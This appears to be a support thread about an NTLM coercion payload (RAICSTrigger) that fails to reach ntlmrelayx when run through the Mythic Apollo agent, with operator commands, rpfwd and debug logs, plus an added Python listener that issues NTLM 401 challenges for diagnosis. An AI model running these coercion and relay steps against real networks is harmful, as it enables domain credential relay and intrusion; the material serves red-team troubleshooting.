Hey,
I tried to use the RAICSTrigger .NET payload from https://github.com/klezVirus/RAIWhateverTrigger with Apollo's execute_assembly function, but I never see a connection to ntlmrelayx. (The same .exe works in Sliver on the same target host.)
Versions:
Target: Windows 10
Mythic: v3.4.6 UI: v0.3.78
Apollo: 2.3.51
Steps to reproduce:
- Compile .net payload from https://github.com/klezVirus/RAIWhateverTrigger/tree/master/RAICSTrigger
- Deploy apollo agent (debug) as standard domain user
- register_assembly
- socks -Action start -Port 7001
- rpfwd -Port 80 -RemoteIP 10.x.xxx.xx -RemotePort 80 -DebugLevel "Connections"
- Setup proxychains and ntlmrelayx (and verify it is working with nc)
- execute_assembly -Assembly RAICSTrigger.exe -Arguments \\127.0.0.1@80\test\test.jpg
Logs:
rpfwd:
Starting server on port 80 where Apollo is running.
Updating Sleep to 0
Started listening on port: 80
[Connection 764198830] - New Connection
Client: 127.0.0.1:51139
[Connection 764198830] - Data (141 Bytes) From Remote Connection
OPTIONS /test/test.jpg HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
translate: f
Host: 127.0.0.1
execute_assembly:
[+] Triggering CreateFileW against: \\127.0.0.1@80\test\test.jpg
[+] NdrClientCall3 returned
[>] Return Pointer: 0x32
apollo debug:
.\apollo_debug.exe
KerberosTicketManager initialized
Initializing process output pipes
Running InitializeProcessOutputPipes as: xx\user
Initialized process output pipes: True
Creating environment block
Got safe startup args
Initializing proc thread attribute list
Setting parent process
Running pre handle duplication as: xx\user
Running get process handle as: xx\user
Running duplicate handles as: xx\user
Duplicating handles
Duplicated StdOut handle normal: True
Duplicated StdErr handle normal: True
Setting up startup info
adding data to output
Got a new connection: 764198830
added new connection to RpfwdManager _connections: 764198830
Got data from client: 764198830, AddRpfwdDatagramToQueue
accepting more connections
got rpfwd datagram to go to mythic: 764198830
got rpfwd datagram to go to mythic: 764198830
routing datagram: 764198830
routing datagram: 764198830
adding data to output
adding data to output
closing pipe in OnAsyncMessageReceived with 0 bytesRead
disconnecting on named pipe
OnDisconnect
no longer collecting output
Sacrificial process exited with code 0x103
Any hints for further debugging? I tried the BOF too, same result. I tried using something like SharpHTTP to make the connection against 127.0.0.1:80, and that works fine: the connection gets to ntlmrelayx.
Thanks and greets
hag
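One way to narrow this down is to put a tiny local stand-in for ntlmrelayx on the other end of the rpfwd and watch how far the WebDAV MiniRedir actually gets. The script below is an added example, not code from the post above or from the Mythic, Apollo or Impacket projects. It assumes you bind it where ntlmrelayx would normally listen (here 127.0.0.1, port given on the command line) and that the rpfwd delivers the MiniRedir traffic to it. It answers every request with `401` + `WWW-Authenticate: NTLM`, which is the challenge an NTLM-aware HTTP server such as ntlmrelayx sends to an unauthenticated client, and then logs whether the next request on the connection carries an NTLM Type 1 token. It is deliberately not a relay: after a Type 1 it replies 401 again so the client gives up. The OPTIONS request embedded in it is constructed from the rpfwd log in the post so the parser can be exercised offline.

```python
"""Diagnostic stand-in for ntlmrelayx: logs the stage the WebDAV MiniRedir reaches.

Added example; not part of the original post or of Mythic/Apollo/Impacket.
"""
import base64
import socket
import struct
import threading
from typing import Any, Dict, Optional

# Constructed sample: the OPTIONS request as captured by rpfwd in the post above.
SAMPLE_REQUEST = (
    b"OPTIONS /test/test.jpg HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045\r\n"
    b"translate: f\r\n"
    b"Host: 127.0.0.1\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> Dict[str, Any]:
    """Split an HTTP/1.1 request head into method, path and lower-cased headers."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return {"method": method.decode("ascii"), "path": path.decode("latin-1"), "headers": headers}


def ntlm_message_type(authorization: Optional[str]) -> Optional[int]:
    """Return the NTLM MessageType (1, 2 or 3) from 'Authorization: NTLM <b64>', else None.

    Every NTLM message starts with the signature 'NTLMSSP\\0' followed by a
    little-endian uint32 MessageType at offset 8.
    """
    if not authorization:
        return None
    scheme, _, token = authorization.partition(" ")
    if scheme.upper() != "NTLM" or not token:
        return None
    try:
        blob = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(blob) < 12 or blob[:8] != b"NTLMSSP\x00":
        return None
    return struct.unpack_from("<I", blob, 8)[0]


def classify(req: Dict[str, Any]) -> str:
    """Name the handshake stage a single request represents."""
    headers = req["headers"]
    if "MiniRedir" not in headers.get("user-agent", ""):
        return "not-webdav-miniredir"
    msg_type = ntlm_message_type(headers.get("authorization"))
    if msg_type is None:
        return "anonymous"          # OPTIONS/PROPFIND probe, no 401 accepted yet
    if msg_type == 1:
        return "ntlm-negotiate"     # client accepted the 401 and started NTLM
    if msg_type == 3:
        return "ntlm-authenticate"  # only follows a real Type 2 challenge
    return "ntlm-unexpected-%d" % msg_type


def challenge_reply() -> bytes:
    """401 that asks for NTLM; this is what makes the MiniRedir send a Type 1."""
    return (
        b"HTTP/1.1 401 Unauthorized\r\n"
        b"WWW-Authenticate: NTLM\r\n"
        b"Content-Length: 0\r\n"
        b"Connection: Keep-Alive\r\n"
        b"\r\n"
    )


def handle_client(conn: socket.socket, peer: Any) -> None:
    """Serve one keep-alive connection: log each request's stage, always answer 401."""
    with conn:
        buf = b""
        while True:
            while b"\r\n\r\n" not in buf:
                chunk = conn.recv(4096)
                if not chunk:
                    return
                buf += chunk
            head, _, buf = buf.partition(b"\r\n\r\n")
            req = parse_request(head + b"\r\n\r\n")
            # Drop any body (PROPFIND carries XML) so the next request parses cleanly.
            clen = int(req["headers"].get("content-length", "0") or 0)
            while len(buf) < clen:
                chunk = conn.recv(4096)
                if not chunk:
                    return
                buf += chunk
            buf = buf[clen:]
            print("[%s:%d] %s %s -> %s" % (peer[0], peer[1], req["method"], req["path"], classify(req)))
            conn.sendall(challenge_reply())


def serve(bind: str = "127.0.0.1", port: int = 80) -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(5)
    print("listening on %s:%d, waiting for the MiniRedir" % (bind, port))
    while True:
        conn, peer = srv.accept()
        threading.Thread(target=handle_client, args=(conn, peer), daemon=True).start()


if __name__ == "__main__":
    import sys
    serve("127.0.0.1", int(sys.argv[1]) if len(sys.argv) > 1 else 80)
```

If the only line you ever see is `OPTIONS ... -> anonymous` and no `ntlm-negotiate` follows, the client never received (or never accepted) the 401, so the problem sits between the rpfwd and the listener rather than in the trigger itself; if `ntlm-negotiate` does show up here but never with ntlmrelayx, the difference is on the proxychains/relay side.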